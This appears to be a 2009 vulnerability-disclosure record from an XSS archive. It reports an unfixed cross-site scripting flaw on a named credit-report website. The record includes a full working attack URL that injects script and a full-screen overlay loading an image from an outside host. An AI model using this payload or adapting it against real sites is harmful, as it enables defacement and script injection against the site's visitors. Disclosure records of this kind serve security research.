Unfixed XSS vulnerability at www.americancreditreport.com

2009-03-18T00:00:00
ID XSSED:58981
Type xssed
Reporter KvK
Modified 2009-05-07T00:00:00

Description

Security researcher KvK, has submitted on 18/03/2009 a cross-site-scripting (XSS) vulnerability affecting www.americancreditreport.com, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/07/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.americancreditreport.com/display.cfm?s="><script>1%3D1%3B</script><div_style%3D"background%3A_%23000_url(http%3A//hzh4xx.700megs.com/xss.png)center_no-repeat%3B_height%3A_100%25%3B_width%3A_100%25%3B_position%3Afixed%3B_left%3A0px%3B_top%3A0px%3B"></div><script>alert('KvK__^^')%3B</script>&pt=2&sp=2&ppc=%2BqWEgB7wUAc%3D&qs=06oENya4ZGJbKUjvjwGtnG1Krbkuoq0aidglwLmUXuLC7fJJAJ7UhLc-M86H4DLTgWKhdgkw8lJFM4h0VaEZoD-2bdpmOjskV2et3l5Qpk4gPDd7VmJ9j5rlvNNR7nBnYsb1N99F-do05eITj4MRpW4WD21SXB48jveNLCNQYnKbTrq4ZgzvMYF3SdyRoAICzuV0rULBT1jKZJmKKKAZfEayJkoLC8Pdc33dOT1tVeMu2xiD_qKg..,YT0z&vid=1237358561_7X02X178854835&rpt=1&lpt=1237358561&bd=-5%23768%231024%231%230%23858%23104&kt=1